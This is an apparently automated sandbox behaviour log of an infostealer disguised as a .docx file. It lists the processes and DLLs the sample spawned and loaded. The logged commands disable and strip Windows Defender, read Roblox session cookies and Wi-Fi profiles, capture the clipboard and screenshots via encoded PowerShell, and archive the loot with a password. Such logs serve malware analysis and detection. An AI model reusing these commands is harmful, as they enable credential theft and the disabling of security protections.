                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: twinui.appcore.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: windows.ui.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: windowmanagementapi.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: inputhost.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
